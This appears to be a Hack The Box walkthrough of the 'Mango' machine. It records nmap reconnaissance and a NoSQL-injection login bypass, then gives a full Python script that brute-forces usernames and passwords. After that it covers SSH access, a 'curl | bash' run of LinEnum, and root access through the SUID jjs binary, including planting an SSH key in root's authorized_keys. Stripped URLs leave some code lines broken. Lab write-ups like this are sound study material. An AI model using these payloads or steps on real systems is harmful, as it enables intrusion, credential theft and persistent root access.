By: Hilbert


Starting with a standard nmap scan…

# Nmap 7.80 scan initiated Fri Nov  1 13:43:18 2019 as: nmap -sC -sV -p- -oN nmapscan.txt
Nmap scan report for
Host is up (0.098s latency).
Not shown: 65532 closed ports
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
|   256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_  256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp  open  http     Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 403 Forbidden
443/tcp open  ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Mango | Search Base
| ssl-cert: Subject: Prv Ltd./stateOrProvinceName=None/countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after:  2020-09-26T14:21:19
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
# Nmap done at Fri Nov  1 13:49:24 2019 -- 1 IP address (1 host up) scanned in 366.57 seconds

We see ssh, http, and https ports are open. Using our web browser to visit the site on port 80 we see we don’t have permission. If we visit the https site (after accepting the certificate) we see


of which the analytics link takes us to


which provides us with nothing more than a rabbit hole to go down. If you looked at the SSL cert instead of blindly accepting it (cough) you’ll see there is another host name.


This was also visible in the nmap scan

ssl-cert: Subject: Prv Ltd./stateOrProvinceName=None/countryName=IN

If we edit that into our /etc/hosts file

root@kali:~/HTB/Boxes/Mango# cat /etc/hosts       localhost       kali

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

and then visit that site with our browser on the standard port, we are greeted by a login page


Here is where the name for the box comes into play. Mango is supposed to make you think of MongoDB which is a popular web backend. MongoDB uses noSQL. By using Burp Suite and some information from this site

We can test if this site is vulnerable to noSQL injection.

noSQL Test

We have a successful login! Looking at the page we don’t see much

home page

other than there is an admin user. However now that we know the site is vulnerable to noSQL injection, we can get the usernames and passwords in the database.


Using the information from the PayloadsAllTheThings page, as well as this helpful blog post

I wrote the following python script….

#!/usr/bin/env python3

import requests
import string

url = ""

def main():
	users = enum_users()

	if users:
		for user in users:
			print('{}:{}'.format(user, users[user]))
		print('\nNo Users Found')

def enum_users():
	users = {}
	partial = {''}
	idle = ''

	while True:
		temp = set()
		for p in partial:
			flag = False
			for char in string.ascii_letters + string.digits:
				idle = print_idle(idle, 'Users')
				test = p + char
				post_data = {'username[$regex]': '^' + test, 'password[$gt]': '', 'login': 'login'}
				r =, data=post_data, allow_redirects=False)
				if r.status_code == 302:
					flag = True
				if char == "9" and not flag:
					users[p] = ""
					print('\nFound User: ' + p)
		partial = temp.copy()
		if not temp:

	return users

def enum_passwords(users):
	special = "~!@#$%^&*(){}[]<>?:"

	for user in users:
		length = get_pass_length(user)
		password = ""
		idle = ""
		for x in range(0, length):
			for char in string.ascii_letters + string.digits + special:
				if char in special:
					char = '\\' + char
				idle = print_idle(idle, 'Password for User \'{}\': {}'.format(user, password.replace('\\', "")))
				test = password + char
				post_data = {'username': user, 'password[$regex]': '^' + test, 'login': 'login'}
				r =, data=post_data, allow_redirects=False)
				if r.status_code == 302:
					password = test
		users[user] = password.replace('\\', "")
		print('\n{}:{}'.format(user, users[user]))

def get_pass_length(user):
	length = 1
	while True:
		post_data = {'username': user, 'password[$regex]': '.{{{}}}'.format(length), 'login': 'login'}
		r =, data=post_data, allow_redirects=False)
		if r.status_code == 302:
			length += 1
			return length - 1

def print_idle(idle, text):
	if (not len(idle)):
		idle = ' ' * 30	
	print('Enumerating {}{}'.format(text,idle), end='\r', flush=True)
	idle += '.'
	if (len(idle) < 8):
		return idle
	if (len(idle) == 8):
		return '        '
	if (len(idle) > 8):
		return '.'

if __name__ == '__main__':

and running it gives us the following users and passwords


We’ll find we can SSH in as user mango with those creds, however the user flag is in /home/admin, the admin password doesn’t work for SSH, but it does work for su

root@kali:~/HTB/Boxes/Mango# ssh mango@
mango@'s password:                                                           
Last login: Mon Nov 11 20:58:31 2019 from
mango@mango:~$ su admin
$ whoami
$ cd /home/admin
$ ls -la
total 24
drwxr-xr-x 2 admin admin 4096 Sep 30 03:20 .
drwxr-xr-x 4 root  root  4096 Sep 27 14:02 ..
lrwxrwxrwx 1 admin admin    9 Sep 27 14:30 .bash_history -> /dev/null
-rw-r--r-- 1 admin admin  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 admin admin 3771 Apr  4  2018 .bashrc
-rw-r--r-- 1 admin admin  807 Apr  4  2018 .profile
-r-------- 1 admin admin   33 Sep 27 14:29 user.txt

On To Root

Running LinEnum we see that there is a binary we can run as admin that runs as root

admin@mango:/home/admin$ curl | bash
[-] SGID files:
-rwsr-sr-- 1 root admin 10352 Jul 18 18:21 /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs

Using information from gtfobins

we can execute the following commands to see the root flag

admin@mango:/home/admin$ jjs
Warning: The jjs tool is planned to be removed from a future JDK release
jjs> var BufferedReader = Java.type("");
jjs> var FileReader = Java.type("");
jjs> var br = new BufferedReader(new FileReader("/root/root.txt"));
jjs> while ((line = br.readLine()) != null) { print(line); };

If that’s not good enough and you want to login as root. We can write our SSH public key into the authorized_keys by placing your SSH key into the following command

echo 'var FileWriter = Java.type("");
var fw=new FileWriter("/root/.ssh/authorize_keys");
fw.write("ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDONWS4A2LUMDmjuCVdsibYEYzZPgVrF4MfdA/FbQatd85IDBIg2ewQxJaOsQerqmHZtnaZ+U1anDQ/C5Llv2jFMrW7iPBgq51qGsRD+GNRqNkciyagUMLc77NMLcm0SvlGfWrm+eoU6QQZM8ZuLDydW2njyGgvPR3+BO/D+k44knVGsOrjCmh8jv1xZc243Dl9DP2kMPb4TiIWg3eBANB3Z/hjvkA7E1spu9L2pImNUh9qd4tosI0UYO/XAuBWoQmH2gk3tVvsCynI48s2TQ64nVUTGAeGEaPC7yNEqm0th0tPU/RTiYtr6eaHmssLRpObjUzpw3rxX1LbPu6yi32TY5xixIqxcfLHCavA3n/Mi+iwmISrEQ3f1BA9fMY86UHwjZj7re38atOhaCKErtlC4JCrWyV2LA2b6Xmd6O2Vmh55YPsUbLFrTxzm8+CYjgOP5nF6AzGrXieJVzP4ldZRkbOUo/7K3M9C1ubOqMUiszNKWTUB78gk36jYPnRprxOHrHqeK/g1k2QW+HiuhHt6V6aLxcNaQkBss06Okid75QgsOwZWn68rNI+umWiXX4pitiJ7OIVFEUzSGnJvDrwkksuIfjK8S0K5L74+RpTCHYSnyxEX9WbaSKo37NvOyiKV4KPpwm3zSIk3nMToeqtVAKC90YMpVIDMQULvUYkG6Q==");
fw.close();' | jjs

and after executing it, we can then SSH in as root.

root@kali:~/HTB/Boxes/Mango# ssh root@
Last login: Mon Nov 11 22:22:19 2019 from
root@mango:~# whoami
root@mango:~# id
uid=0(root) gid=0(root) groups=0(root)

If you found this walkthrough helpful, please consider adding a respect to my profile, thanks.